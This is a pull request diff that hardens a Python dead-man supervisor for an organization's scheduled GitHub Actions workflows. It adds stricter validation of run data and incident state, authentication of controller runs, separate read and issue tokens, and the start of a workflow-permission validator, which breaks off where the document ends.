### PR TITLE
fix(sre): harden estate dead-man authority

### DIFF
--- a/.github/scripts/estate_deadman.py
+++ b/.github/scripts/estate_deadman.py
@@ -28,6 +28,9 @@ from typing import Any, Callable, Mapping, Sequence
 
 POLICY_SCHEMA = "szl.estate-deadman-policy/v1"
 RECEIPT_SCHEMA = "szl.estate-deadman-receipt/v1"
+INCIDENT_STATE_SCHEMA = "szl.estate-deadman-incident-state/v1"
+GITHUB_ACTIONS_BOT = "github-actions[bot]"
+CONTROLLER_WORKFLOW_PATH = ".github/workflows/estate-deadman.yml"
 USER_AGENT = "SZLHOLDINGS-EstateDeadman/1.0"
 MAX_RESPONSE_BYTES = 1_048_576
 REPOSITORY = re.compile(r"^szl-holdings/[A-Za-z0-9_.-]+$")
@@ -35,6 +38,18 @@ WORKFLOW_PATH = re.compile(r"^\.github/workflows/[A-Za-z0-9_.-]+\.ya?ml$")
 TARGET_ID = re.compile(r"^[a-z0-9][a-z0-9-]{0,63}$")
 SHA40 = re.compile(r"^[0-9a-f]{40}$")
 ACTIVE_STATUSES = {"queued", "in_progress", "waiting", "requested", "pending"}
+RUN_STATUSES = ACTIVE_STATUSES | {"completed"}
+RUN_CONCLUSIONS = {
+    "action_required",
+    "cancelled",
+    "failure",
+    "neutral",
+    "skipped",
+    "stale",
+    "startup_failure",
+    "success",
+    "timed_out",
+}
 STATE_MARKER_BEGIN = "<!-- SZL_ESTATE_DEADMAN_STATE_BEGIN\n"
 STATE_MARKER_END = "\nSZL_ESTATE_DEADMAN_STATE_END -->"
 
@@ -80,10 +95,10 @@ class TargetObservation:
     latest_status: str | None
     latest_conclusion: str | None
     latest_created_at: str | None
-    latest_completed_at: str | None
+    latest_updated_at: str | None
     latest_html_url: str | None
     last_success_run_id: int | None
-    last_success_completed_at: str | None
+    last_success_updated_at: str | None
     success_age_minutes: int | None
     active_age_minutes: int | None
     error_kind: str | None = None
@@ -112,7 +127,10 @@ def minutes_old(value: Any, now: dt.datetime) -> int | None:
     parsed = parse_time(value)
     if parsed is None:
         return None
-    return max(0, int((now - parsed).total_seconds() // 60))
+    seconds = (now - parsed).total_seconds()
+    if seconds < 0:
+        return None
+    return int(seconds // 60)
 
 
 def canonical_json(value: Any) -> bytes:
@@ -126,6 +144,87 @@ def canonical_json(value: Any) -> bytes:
 
 def sha256_hex(value: bytes) -> str:
     return hashlib.sha256(value).hexdigest()
+
+
+def reject_duplicate_pairs(pairs: Sequence[tuple[str, Any]]) -> dict[str, Any]:
+    result: dict[str, Any] = {}
+    for key, value in pairs:
+        require(key not in result, f"duplicate JSON object key: {key}")
+        result[key] = value
+    return result
+
+
+def parse_incident_state(body: Any, repository: str) -> dict[str, Any]:
+    require(isinstance(body, str), "controller incident body is missing")
+    require(
+        body.count(STATE_MARKER_BEGIN) == 1 and body.count(STATE_MARKER_END) == 1,
+        "controller incident state marker is missing or ambiguous",
+    )
+    start = body.index(STATE_MARKER_BEGIN) + len(STATE_MARKER_BEGIN)
+    end = body.index(STATE_MARKER_END, start)
+    try:
+        state = json.loads(body[start:end])
+    except json.JSONDecodeError as exc:
+        raise ContractError("controller incident state is not valid JSON") from exc
+    require(isinstance(state, dict), "controller incident state must be an object")
+    require(
+        state.get("schema") == INCIDENT_STATE_SCHEMA,
+        "controller incident state schema is invalid",
+    )
+    require(
+        state.get("controller_repository") == repository,
+        "controller incident repository binding is invalid",
+    )
+    revision = state.get("controller_revision")
+    require(
+        isinstance(revision, str) and bool(SHA40.fullmatch(revision)),
+        "controller incident revision is invalid",
+    )
+    branch = state.get("controller_branch")
+    require(
+        isinstance(branch, str)
+        and bool(re.fullmatch(r"[A-Za-z0-9._/-]+", branch))
+        and ".." not in branch,
+        "controller incident branch is invalid",
+    )
+    run_id = state.get("controller_run_id")
+    require(
+        isinstance(run_id, int) and not isinstance(run_id, bool) and run_id > 0,
+        "controller incident run id is invalid",
+    )
+    run_attempt = state.get("controller_run_attempt")
+    require(
+        isinstance(run_attempt, int)
+        and not isinstance(run_attempt, bool)
+        and run_attempt > 0,
+        "controller incident run attempt is invalid",
+    )
+    policy_sha256 = state.get("policy_sha256")
+    require(
+        isinstance(policy_sha256, str)
+        and bool(re.fullmatch(r"[0-9a-f]{64}", policy_sha256)),
+        "controller incident policy digest is invalid",
+    )
+    evidence_sha256 = state.get("evidence_sha256")
+    require(
+        isinstance(evidence_sha256, str)
+        and bool(re.fullmatch(r"[0-9a-f]{64}", evidence_sha256)),
+        "controller incident evidence digest is invalid",
+    )
+    require(
+        parse_time(state.get("updated_at")) is not None,
+        "controller incident timestamp is invalid",
+    )
+    failed = state.get("failed_target_ids")
+    require(isinstance(failed, list), "controller incident failed targets are invalid")
+    require(
+        all(
+            isinstance(item, str) and bool(TARGET_ID.fullmatch(item)) for item in failed
+        ),
+        "controller incident failed target id is invalid",
+    )
+    require(len(failed) == len(set(failed)), "controller incident target ids repeat")
+    return dict(state)
 
 
 def require(condition: bool, message: str) -> None:
@@ -169,7 +268,9 @@ def validate_policy(raw: Any) -> dict[str, Any]:
         bool(REPOSITORY.fullmatch(controller_repository)),
         "controller_repository escaped szl-holdings",
     )
-    controller_branch = require_string(raw.get("controller_branch"), "controller_branch")
+    controller_branch = require_string(
+        raw.get("controller_branch"), "controller_branch"
+    )
     require(
         re.fullmatch(r"[A-Za-z0-9._/-]+", controller_branch) is not None
         and ".." not in controller_branch,
@@ -178,7 +279,7 @@ def validate_policy(raw: Any) -> dict[str, Any]:
 
     confirmation = raw.get("confirmation")
     require(isinstance(confirmation, dict), "confirmation must be an object")
-    samples = require_int(confirmation.get("samples"), "confirmation.samples", 2, 3)
+    samples = require_int(confirmation.get("samples"), "confirmation.samples", 2, 2)
     interval_seconds = require_int(
         confirmation.get("interval_seconds"),
         "confirmation.interval_seconds",
@@ -190,9 +291,6 @@ def validate_policy(raw: Any) -> dict[str, Any]:
     require(isinstance(incident, dict), "incident must be an object")
     incident_title = require_string(incident.get("title"), "incident.title")
     require(len(incident_title) <= 120, "incident.title is too long")
-    refresh_minutes = require_int(
-        incident.get("refresh_minutes"), "incident.refresh_minutes", 15, 1440
-    )
 
     targets_raw = raw.get("targets")
     require(isinstance(targets_raw, list) and targets_raw, "targets must be non-empty")
@@ -271,7 +369,6 @@ def validate_policy(raw: Any) -> dict[str, Any]:
         },
         "incident": {
             "title": incident_title,
-            "refresh_minutes": refresh_minutes,
         },
         "targets": targets,
     }
@@ -279,12 +376,17 @@ def validate_policy(raw: Any) -> dict[str, Any]:
 
 def load_policy(path: Path) -> tuple[dict[str, Any], str]:
     try:
-        raw = json.loads(path.read_text(encoding="utf-8"))
+        worktree_source = path.read_bytes()
+        source = worktree_source.replace(b"\r\n", b"\n")
+        require(b"\r" not in source, "policy contains a lone carriage return")
+        raw = json.loads(
+            source.decode("utf-8"), object_pairs_hook=reject_duplicate_pairs
+        )
     except OSError as exc:
         raise ContractError(f"cannot read policy: {safe_error_kind(exc)}") from exc
-    except json.JSONDecodeError as exc:
+    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
         raise ContractError("policy is not valid JSON") from exc
-    return validate_policy(raw), sha256_hex(canonical_json(raw))
+    return validate_policy(raw), sha256_hex(source)
 
 
 class GitHubApi:
@@ -385,9 +487,15 @@ class GitHubApi:
         require(isinstance(payload, dict), "workflow-runs response must be an object")
         runs = payload.get("workflow_runs")
         require(isinstance(runs, list), "workflow_runs must be a list")
-        return [dict(item) for item in runs if isinstance(item, dict)]
+        require(
+            all(isinstance(item, dict) for item in runs),
+            "workflow_runs contains a malformed row",
+        )
+        return [dict(item) for item in runs]
 
-    def workflow_change(self, target: Mapping[str, Any]) -> tuple[str | None, str | None]:
+    def workflow_change(
+        self, target: Mapping[str, Any]
+    ) -> tuple[str | None, str | None]:
         query = urllib.parse.urlencode(
             {
                 "path": target["workflow_path"],
@@ -395,9 +503,7 @@ class GitHubApi:
                 "per_page": "1",
             }
         )
-        payload = self.request(
-            "GET", f"/repos/{target['repository']}/commits?{query}"
-        )
+        payload = self.request("GET", f"/repos/{target['repository']}/commits?{query}")
         require(isinstance(payload, list), "workflow commit response must be a list")
         if not payload or not isinstance(payload[0], dict):
             return None, None
@@ -416,6 +522,67 @@ class GitHubApi:
             str(changed_at) if isinstance(changed_at, str) else None,
         )
 
+    def authenticate_referenced_controller_run(
+        self, repository: str, state: Mapping[str, Any]
+    ) -> str:
+        run_id = state["controller_run_id"]
+        run_attempt = state["controller_run_attempt"]
+        payload = self.request(
+            "GET",
+            f"/repos/{repository}/actions/runs/{run_id}/attempts/{run_attempt}",
+        )
+        require(isinstance(payload, dict), "controller run response must be an object")
+        run_repository = payload.get("repository")
+        head_repository = payload.get("head_repository")
+        require(
+            isinstance(run_repository, dict)
+            and run_repository.get("full_name") == repository,
+            "controller run repository binding is invalid",
+        )
+        require(
+            isinstance(head_repository, dict)
+            and head_repository.get("full_name") == repository,
+            "controller run head repository binding is invalid",
+        )
+        require(payload.get("id") == run_id, "controller run id binding is invalid")
+        require(
+            payload.get("run_attempt") == run_attempt,
+            "controller run attempt binding is invalid",
+        )
+        require(payload.get("event") == "schedule", "controller run event is invalid")
+        require(
+            payload.get("path") == CONTROLLER_WORKFLOW_PATH,
+            "controller run workflow path is invalid",
+        )
+        require(
+            payload.get("head_branch") == state["controller_branch"],
+            "controller run branch binding is invalid",
+        )
+        require(
+            payload.get("head_sha") == state["controller_revision"],
+            "controller run revision binding is invalid",
+        )
+        require(
+            payload.get("status") == "completed",
+            "controller run is not terminal",
+        )
+        started_at = payload.get("run_started_at") or payload.get("created_at")
+        updated_at = payload.get("updated_at")
+        state_at = parse_time(state.get("updated_at"))
+        started_time = parse_time(started_at)
+        updated_time = parse_time(updated_at)
+        require(
+            started_time is not None
+            and updated_time is not None
+            and state_at is not None,
+            "controller run timestamp is invalid",
+        )
+        require(
+            started_time <= state_at <= updated_time + dt.timedelta(minutes=5),
+            "controller incident timestamp is outside its authenticated run",
+        )
+        return str(state.get("updated_at"))
+
     def find_incident(self, repository: str, title: str) -> dict[str, Any] | None:
         query = urllib.parse.urlencode(
             {
@@ -425,16 +592,47 @@ class GitHubApi:
         )
         payload = self.request("GET", f"/search/issues?{query}")
         require(isinstance(payload, dict), "issue search response must be an object")
+        require(
+            payload.get("incomplete_results") is False,
+            "issue search results are incomplete",
+        )
         items = payload.get("items")
         require(isinstance(items, list), "issue search items must be a list")
-        matches = [
-            dict(item)
-            for item in items
-            if isinstance(item, dict)
-            and "pull_request" not in item
-            and item.get("title") == title
-        ]
-        require(len(matches) <= 1, "multiple dead-man incidents exist")
+        total_count = payload.get("total_count")
+        require(
+            isinstance(total_count, int)
+            and not isinstance(total_count, bool)
+            and 0 <= total_count <= len(items),
+            "issue search results are truncated or malformed",
+        )
+        matches: list[dict[str, Any]] = []
+        for item in items:
+            if (
+                not isinstance(item, dict)
+                or "pull_request" in item
+                or item.get("title") != title
+            ):
+                continue
+            user = item.get("user")
+            if not isinstance(user, dict) or user.get("login") != GITHUB_ACTIONS_BOT:
+                continue
+            require(
+                user.get("type") == "Bot", "controller incident author type is invalid"
+            )
+            match = dict(item)
+            match["_controller_state"] = parse_incident_state(
+                match.get("body"), repository
+            )
+            match["_referenced_run_authenticated_at"] = (
+                self.authenticate_referenced_controller_run(
+                    repository, match["_controller_state"]
+                )
+            )
+            matches.append(match)
+        require(
+            len(matches) <= 1,
+            "multiple bot-authored marker-consistent dead-man incidents exist",
+        )
         return matches[0] if matches else None
 
     def create_issue(self, repository: str, title: str, body: str) -> dict[str, Any]:
@@ -445,6 +643,15 @@ class GitHubApi:
             {"title": title, "body": body},
         )
         require(isinstance(payload, dict), "issue create response must be an object")
+        return payload
+
+    def issue(self, repository: str, number: int) -> dict[str, Any]:
+        payload = self.request("GET", f"/repos/{repository}/issues/{number}")
+        require(isinstance(payload, dict), "issue readback response must be an object")
+        require(
+            "pull_request" not in payload,
+            "incident readback resolved to a pull request",
+        )
         return payload
 
     def update_issue(
@@ -463,9 +670,7 @@ class GitHubApi:
             update["state"] = state
             if state == "closed":
                 update["state_reason"] = "completed"
-        payload = self.request(
-            "PATCH", f"/repos/{repository}/issues/{number}", update
-        )
+        payload = self.request("PATCH", f"/repos/{repository}/issues/{number}", update)
         require(isinstance(payload, dict), "issue update response must be an object")
         return payload
 
@@ -476,12 +681,43 @@ class GitHubApi:
         )
 
 
-def latest_timestamp(run: Mapping[str, Any]) -> str | None:
-    for name in ("completed_at", "updated_at", "run_started_at", "created_at"):
-        value = run.get(name)
-        if isinstance(value, str) and value:
-            return value
-    return None
+def validate_run_rows(runs: Sequence[Mapping[str, Any]]) -> None:
+    ids: set[int] = set()
+    for index, item in enumerate(runs):
+        require(isinstance(item, Mapping), f"workflow run {index} is not an object")
+        run_id = item.get("id")
+        require(
+            isinstance(run_id, int) and not isinstance(run_id, bool) and run_id > 0,
+            f"workflow run {index} id is invalid",
+        )
+        require(run_id not in ids, "workflow run ids repeat")
+        ids.add(run_id)
+        require(
+            parse_time(item.get("created_at")) is not None,
+            f"workflow run {run_id} creation timestamp is invalid",
+        )
+        status = item.get("status")
+        require(status in RUN_STATUSES, f"workflow run {run_id} status is invalid")
+        conclusion = item.get("conclusion")
+        if status == "completed":
+            require(
+                conclusion in RUN_CONCLUSIONS,
+                f"workflow run {run_id} conclusion is invalid",
+            )
+            require(
+                parse_time(item.get("updated_at")) is not None,
+                f"workflow run {run_id} terminal update timestamp is invalid",
+            )
+        else:
+            require(
+                conclusion is None,
+                f"active workflow run {run_id} has a conclusion",
+            )
+        started_at = item.get("run_started_at")
+        require(
+            started_at is None or parse_time(started_at) is not None,
+            f"workflow run {run_id} start timestamp is invalid",
+        )
 
 
 def evaluate_target(
@@ -493,6 +729,7 @@ def evaluate_target(
     workflow_changed_at: str | None,
     now: dt.datetime,
 ) -> TargetObservation:
+    validate_run_rows(runs)
     workflow_state = workflow.get("state")
     workflow_id = workflow.get("id") if isinstance(workflow.get("id"), int) else None
     if workflow_state != "active":
@@ -511,18 +748,20 @@ def evaluate_target(
             latest_status=None,
             latest_conclusion=None,
             latest_created_at=None,
-            latest_completed_at=None,
+            latest_updated_at=None,
             latest_html_url=None,
             last_success_run_id=None,
-            last_success_completed_at=None,
+            last_success_updated_at=None,
             success_age_minutes=None,
             active_age_minutes=None,
         )
 
     ordered = sorted(
         runs,
-        key=lambda item: parse_time(item.get("created_at"))
-        or dt.datetime.min.replace(tzinfo=dt.timezone.utc),
+        key=lambda item: (
+            parse_time(item.get("created_at"))
+            or dt.datetime.min.replace(tzinfo=dt.timezone.utc)
+        ),
         reverse=True,
     )
     latest = ordered[0] if ordered else None
@@ -531,12 +770,16 @@ def evaluate_target(
         for item in ordered
         if item.get("status") == "completed" and item.get("conclusion") == "success"
     ]
+    completed = [item for item in ordered if item.get("status") == "completed"]
+    latest_completed = completed[0] if completed else None
     last_success = successes[0] if successes else None
-    success_age = minutes_old(latest_timestamp(last_success or {}), now)
+    success_age = minutes_old((last_success or {}).get("created_at"), now)
     change_age = minutes_old(workflow_changed_at, now)
 
     if latest is None:
-        bootstrapping = change_age is not None and change_age <= target["bootstrap_grace_minutes"]
+        bootstrapping = (
+            change_age is not None and change_age <= target["bootstrap_grace_minutes"]
+        )
         return TargetObservation(
             id=target["id"],
             repository=target["repository"],
@@ -556,10 +799,10 @@ def evaluate_target(
             latest_status=None,
             latest_conclusion=None,
             latest_created_at=None,
-            latest_completed_at=None,
+            latest_updated_at=None,
             latest_html_url=None,
             last_success_run_id=None,
-            last_success_completed_at=None,
+            last_success_updated_at=None,
             success_age_minutes=None,
             active_age_minutes=None,
         )
@@ -568,7 +811,7 @@ def evaluate_target(
     latest_conclusion = (
         str(latest.get("conclusion")) if latest.get("conclusion") is not None else None
     )
-    latest_age = minutes_old(latest.get("run_started_at") or latest.get("created_at"), now)
+    latest_age = minutes_old(latest.get("created_at"), now)
     last_success_id = (
         last_success.get("id")
         if isinstance(last_success, dict) and isinstance(last_success.get("id"), int)
@@ -582,34 +825,60 @@ def evaluate_target(
         "workflow_id": workflow_id,
         "workflow_revision": workflow_revision,
         "workflow_changed_at": workflow_changed_at,
-        "latest_run_id": latest.get("id") if isinstance(latest.get("id"), int) else None,
+        "latest_run_id": latest.get("id")
+        if isinstance(latest.get("id"), int)
+        else None,
         "latest_status": latest_status,
         "latest_conclusion": latest_conclusion,
         "latest_created_at": latest.get("created_at"),
-        "latest_completed_at": latest.get("completed_at"),
+        "latest_updated_at": latest.get("updated_at"),
         "latest_html_url": latest.get("html_url"),
         "last_success_run_id": last_success_id,
-        "last_success_completed_at": latest_timestamp(last_success or {}),
+        "last_success_updated_at": (last_success or {}).get("updated_at"),
         "success_age_minutes": success_age,
         "active_age_minutes": latest_age if latest_status in ACTIVE_STATUSES else None,
     }
 
     if latest_status in ACTIVE_STATUSES:
-        active_fresh = latest_age is not None and latest_age <= target["max_active_age_minutes"]
-        success_fresh = success_age is not None and success_age <= target["max_success_age_minutes"]
+        active_fresh = (
+            latest_age is not None and latest_age <= target["max_active_age_minutes"]
+        )
+        completed_baseline_age = minutes_old(
+            (latest_completed or {}).get("created_at"), now
+        )
+        completed_baseline_fresh = (
+            latest_completed is not None
+            and latest_completed.get("conclusion") == "success"
+            and completed_baseline_age is not None
+            and completed_baseline_age <= target["max_success_age_minutes"]
+        )
         bootstrapping = (
-            last_success is None
+            latest_completed is None
             and change_age is not None
             and change_age <= target["bootstrap_grace_minutes"]
         )
-        healthy = active_fresh and (success_fresh or bootstrapping)
+        healthy = active_fresh and (completed_baseline_fresh or bootstrapping)
         return TargetObservation(
             healthy=healthy,
-            state="RUNNING" if healthy else "STUCK_ACTIVE",
+            state=(
+                "RUNNING"
+                if healthy
+                else (
+                    "ACTIVE_WITH_FAILED_BASELINE"
+                    if latest_completed is not None
+                    and latest_completed.get("conclusion") != "success"
+                    else "STUCK_ACTIVE"
+                )
+            ),
             reason=(
                 "scheduled run is active within its duration budget"
                 if healthy
-                else "active run exceeded its duration or has no fresh success baseline"
+                else (
+                    "latest completed scheduled run did not succeed"
+                    if latest_completed is not None
+                    and latest_completed.get("conclusion") != "success"
+                    else "active run exceeded its duration or has no fresh success baseline"
+                )
             ),
             **common,
         )
@@ -630,7 +899,9 @@ def evaluate_target(
             **common,
         )
 
-    healthy = success_age is not None and success_age <= target["max_success_age_minutes"]
+    healthy = (
+        success_age is not None and success_age <= target["max_success_age_minutes"]
+    )
     return TargetObservation(
         healthy=healthy,
         state="HEALTHY" if healthy else "STALE_SUCCESS",
@@ -676,10 +947,10 @@ def observe_target(
             latest_status=None,
             latest_conclusion=None,
             latest_created_at=None,
-            latest_completed_at=None,
+            latest_updated_at=None,
             latest_html_url=None,
             last_success_run_id=None,
-            last_success_completed_at=None,
+            last_success_updated_at=None,
             success_age_minutes=None,
             active_age_minutes=None,
             error_kind=safe_error_kind(exc),
@@ -694,12 +965,56 @@ def observe_all(
     return [observe_target(api, target, now) for target in policy["targets"]]
 
 
+def confirmed_failure_ids(
+    samples: Sequence[Sequence[TargetObservation]], required_samples: int
+) -> list[str]:
+    require(bool(samples), "dead-man samples are missing")
+    first_ids = [item.id for item in samples[0]]
+    require(len(first_ids) == len(set(first_ids)), "dead-man target ids repeat")
+    first_failed = {item.id for item in samples[0] if not item.healthy}
+    if not first_failed:
+        return []
+    require(
+        len(samples) == required_samples,
+        "suspected failures were not sampled the required number of times",
+    )
+    confirmed = set(first_failed)
+    for sample in samples[1:]:
+        sample_ids = [item.id for item in sample]
+        require(sample_ids == first_ids, "dead-man sample target order drifted")
+        confirmed.intersection_update(item.id for item in sample if not item.healthy)
+    return [item_id for item_id in first_ids if item_id in confirmed]
+
+
+def classify_confirmation(
+    samples: Sequence[Sequence[TargetObservation]], confirmed_ids: Sequence[str]
+) -> str:
+    require(bool(samples), "dead-man samples are missing")
+    if confirmed_ids:
+        return "CONFIRMED_FAILURE"
+    if any(not item.healthy for sample in samples for item in sample):
+        return "INCONCLUSIVE"
+    return "HEALTHY"
+
+
 def issue_body(report: Mapping[str, Any]) -> str:
     final = report.get("final_sample") or []
-    failed = [item for item in final if not item.get("healthy")]
+    confirmed_ids = report.get("confirmed_failed_target_ids")
+    require(
+        isinstance(confirmed_ids, list)
+        and all(isinstance(item, str) for item in confirmed_ids),
+        "confirmed failed target ids are missing or invalid",
+    )
+    failed = [item for item in final if item.get("id") in set(confirmed_ids)]
     state = {
-        "schema": "szl.estate-deadman-incident-state/v1",
+        "schema": INCIDENT_STATE_SCHEMA,
         "updated_at": report.get("generated_at"),
+        "controller_repository": report.get("controller_repository"),
+        "controller_branch": report.get("controller_branch"),
+        "controller_revision": report.get("controller_revision"),
+        "controller_run_id": report.get("controller_run_id"),
+        "controller_run_attempt": report.get("controller_run_attempt"),
+        "policy_sha256": report.get("policy_sha256"),
         "evidence_sha256": report.get("evidence_sha256"),
         "failed_target_ids": [item.get("id") for item in failed],
     }
@@ -721,7 +1036,9 @@ def issue_body(report: Mapping[str, Any]) -> str:
                 id=item.get("id"),
                 state=item.get("state"),
                 run=item.get("latest_run_id") or "—",
-                conclusion=item.get("latest_conclusion") or item.get("latest_status") or "—",
+                conclusion=item.get("latest_conclusion")
+                or item.get("latest_status")
+                or "—",
                 age=(
                     f"{item.get('success_age_minutes')}m"
                     if item.get("success_age_minutes") is not None
@@ -748,12 +1065,29 @@ def reconcile_incident(
     api: GitHubApi,
     policy: Mapping[str, Any],
     report: Mapping[str, Any],
-    now: dt.datetime,
+    _now: dt.datetime,
 ) -> dict[str, Any]:
     repository = policy["controller_repository"]
     title = policy["incident"]["title"]
     current = api.find_incident(repository, title)
-    if report["confirmed_healthy"]:
+
+    def prove_readback(
+        number: int, *, state: str, body: str | None = None
+    ) -> dict[str, Any]:
+        readback = api.issue(repository, number)
+        require(readback.get("number") == number, "incident readback number drifted")
+        require(readback.get("title") == title, "incident readback title drifted")
+        require(readback.get("state") == state, "incident readback state drifted")
+        if body is not None:
+            require(readback.get("body") == body, "incident readback body drifted")
+        return readback
+
+    confirmation_state = report.get("confirmation_state")
+    require(
+        confirmation_state in {"HEALTHY", "CONFIRMED_FAILURE", "INCONCLUSIVE"},
+        "confirmation state is invalid",
+    )
+    if confirmation_state == "HEALTHY":
         if current is None:
             return {"action": "none", "ok": True}
         number = current.get("number")
@@ -764,27 +1098,27 @@ def reconcile_incident(
             f"Independent scheduled-control evidence recovered at `{report['generated_at']}`. Closing automatically.",
         )
         api.update_issue(repository, number, state="closed")
+        prove_readback(number, state="closed")
         return {"action": "closed", "ok": True, "issue_number": number}
+
+    if confirmation_state == "INCONCLUSIVE":
+        return {"action": "inconclusive", "ok": False}
 
     body = issue_body(report)
     if current is None:
         created = api.create_issue(repository, title, body)
+        number = created.get("number")
+        require(isinstance(number, int), "created incident number is invalid")
+        prove_readback(number, state="open", body=body)
         return {
             "action": "created",
             "ok": True,
-            "issue_number": created.get("number"),
+            "issue_number": number,
         }
     number = current.get("number")
     require(isinstance(number, int), "incident number is invalid")
-    age = minutes_old(current.get("updated_at"), now)
-    if age is not None and age < policy["incident"]["refresh_minutes"]:
-        return {
-            "action": "throttled",
-            "ok": True,
-            "issue_number": number,
-            "age_minutes": age,
-        }
     api.update_issue(repository, number, body=body)
+    prove_readback(number, state="open", body=body)
     return {"action": "refreshed", "ok": True, "issue_number": number}
 
 
@@ -829,16 +1163,19 @@ def run_live(
     *,
     sleep_fn: Callable[[float], None] = time.sleep,
 ) -> int:
-    token = (os.getenv("GITHUB_TOKEN") or os.getenv("GH_TOKEN") or "").strip() or None
-    require(bool(token), "GITHUB_TOKEN is required for live supervision")
+    read_token = (os.getenv("ESTATE_READ_TOKEN") or "").strip() or None
+    issue_token = (os.getenv("GITHUB_TOKEN") or "").strip() or None
+    require(bool(read_token), "ESTATE_READ_TOKEN is required for live observation")
+    require(bool(issue_token), "GITHUB_TOKEN is required for incident lifecycle")
     repository = os.getenv("GITHUB_REPOSITORY", "").strip()
     if repository:
         require(
             repository == policy["controller_repository"],
             "workflow repository does not match the dead-man authority",
         )
-    api = GitHubApi(token)
-    controller_tip = api.verified_branch_tip(
+    read_api = GitHubApi(read_token)
+    incident_api = GitHubApi(issue_token)
+    controller_tip = read_api.verified_branch_tip(
         policy["controller_repository"], policy["controller_branch"]
     )
     workflow_sha = os.getenv("GITHUB_SHA", "").strip()
@@ -847,31 +1184,53 @@ def run_live(
             workflow_sha == controller_tip,
             "dead-man is not running from the exact verified controller tip",
         )
+    run_id_text = os.getenv("GITHUB_RUN_ID", "").strip()
+    run_attempt_text = os.getenv("GITHUB_RUN_ATTEMPT", "").strip()
+    require(
+        bool(re.fullmatch(r"[1-9][0-9]*", run_id_text)),
+        "GITHUB_RUN_ID is missing or invalid",
+    )
+    require(
+        bool(re.fullmatch(r"[1-9][0-9]*", run_attempt_text)),
+        "GITHUB_RUN_ATTEMPT is missing or invalid",
+    )
+    controller_run_id = int(run_id_text)
+    controller_run_attempt = int(run_attempt_text)
 
     samples: list[list[TargetObservation]] = []
-    samples.append(observe_all(api, policy, dt.datetime.now(dt.timezone.utc)))
+    samples.append(observe_all(read_api, policy, dt.datetime.now(dt.timezone.utc)))
     for _ in range(1, policy["confirmation"]["samples"]):
         if all(item.healthy for item in samples[-1]):
             break
         sleep_fn(policy["confirmation"]["interval_seconds"])
-        samples.append(observe_all(api, policy, dt.datetime.now(dt.timezone.utc)))
+        samples.append(observe_all(read_api, policy, dt.datetime.now(dt.timezone.utc)))
 
     final_sample = samples[-1]
-    confirmed_healthy = all(item.healthy for item in final_sample)
+    confirmed_failed_target_ids = confirmed_failure_ids(
+        samples, policy["confirmation"]["samples"]
+    )
+    confirmation_state = classify_confirmation(samples, confirmed_failed_target_ids)
+    confirmed_healthy = confirmation_state == "HEALTHY"
     report: dict[str, Any] = {
         "schema": RECEIPT_SCHEMA,
         "generated_at": utc_now(),
         "controller_repository": policy["controller_repository"],
+        "controller_branch": policy["controller_branch"],
         "controller_revision": controller_tip,
+        "controller_run_id": controller_run_id,
+        "controller_run_attempt": controller_run_attempt,
         "policy_sha256": policy_sha256,
         "sample_count": len(samples),
+        "confirmation_state": confirmation_state,
         "confirmed_healthy": confirmed_healthy,
         "healthy_target_count": sum(item.healthy for item in final_sample),
         "target_count": len(final_sample),
+        "confirmed_failed_target_ids": confirmed_failed_target_ids,
         "samples": [[item.receipt() for item in sample] for sample in samples],
         "final_sample": [item.receipt() for item in final_sample],
         "authority": {
             "fixed_github_origin": True,
+            "controller_tip_reverified": False,
             "workflow_mutation": False,
             "branch_mutation": False,
             "deployment_mutation": False,
@@ -881,26 +1240,35 @@ def run_live(
         },
         "secret_values_recorded": False,
     }
-    report["evidence_sha256"] = sha256_hex(canonical_json(report))
     try:
+        current_controller_tip = read_api.verified_branch_tip(
+            policy["controller_repository"], policy["controller_branch"]
+        )
+        require(
+            current_controller_tip == controller_tip,
+            "controller authority changed during observation",
+        )
+        report["authority"]["controller_tip_reverified"] = True
+        report["evidence_sha256"] = sha256_hex(canonical_json(report))
         report["incident"] = reconcile_incident(
-            api,
+            incident_api,
             policy,
             report,
             dt.datetime.now(dt.timezone.utc),
         )
     except Exception as exc:
+        report.setdefault("evidence_sha256", sha256_hex(canonical_json(report)))
         report["incident"] = {
             "action": "failed",
             "ok": False,
             "error_kind": safe_error_kind(exc),
         }
-    report["receipt_sha256"] = sha256_hex(canonical_json(report))
     write_json_atomic(output, report)
+    receipt_file_sha256 = sha256_hex(output.read_bytes())
     output.with_suffix(output.suffix + ".sha256").write_text(
-        report["receipt_sha256"] + "\n", encoding="ascii"
+        receipt_file_sha256 + "\n", encoding="ascii"
     )
-    return 0 if confirmed_healthy else 2
+    return 0 if confirmation_state == "HEALTHY" else 2
 
 
 def build_parser() -> argparse.ArgumentParser:

--- a/.github/scripts/test_code_security_drift.py
+++ b/.github/scripts/test_code_security_drift.py
@@ -344,6 +344,12 @@ class TestProductionWorkflowAuthContract(unittest.TestCase):
                         "permission-organization-administration": "read",
                     },
                 ),
+                ".github/workflows/estate-deadman.yml": (
+                    {
+                        "permission-actions": "read",
+                        "permission-contents": "read",
+                    },
+                ),
                 ".github/workflows/organization-control-sweep.yml": (
                     {
                         "permission-actions": "read",

--- a/.github/scripts/validate_estate_deadman_workflow.py
+++ b/.github/scripts/validate_estate_deadman_workflow.py
@@ -1,0 +1,422 @@
+#!/usr/bin/env python3
+"""Validate the exact authority boundary of the estate dead-man workflow."""
+
+from __future__ import annotations
+
+import hashlib
+import json
+import re
+from pathlib import Path
+
+WORKFLOW_PATH = Path(".github/workflows/estate-deadman.yml")
+EXPECTED_PERMISSIONS = {
+    "actions": "read",
+    "contents": "read",
+    "issues": "write",
+}
+SCALAR = re.compile(r"^  ([a-z][a-z0-9-]*): (read|write|none)$")
+CHECKOUT_ACTION = "actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1"
+EXPECTED_WORKFLOW_SHA256 = (
+    "f3c14a6730617569892f56a76660babb05ab7a52c43349f6d9355d3c84d3607e"
+)
+EXPECTED_STEP_NAMES = (
+    "Harden runner",
+    "Checkout exact scheduled default-branch revision",
+    "Require exact schedule authority",
+    "Set up Python",
+    "Re-prove dead-man contracts before live observation",
+    "Mint exact read-only estate observer",
+    "Observe and reconcile the critical scheduled control planes",
+    "Write operator summary",
+    "Upload immutable supervisor evidence",
+    "Require a confirmed healthy control plane",
+)
+EXPECTED_ACTIONS = (
+    "step-security/harden-runner@05e31511f85b41b11d1cf0ef85d0992719546e2c",
+    CHECKOUT_ACTION,
+    "actions/setup-python@5fda3b95a4ea91299a34e894583c3862153e4b97",
+    "actions/create-github-app-token@bcd2ba49218906704ab6c1aa796996da409d3eb1",
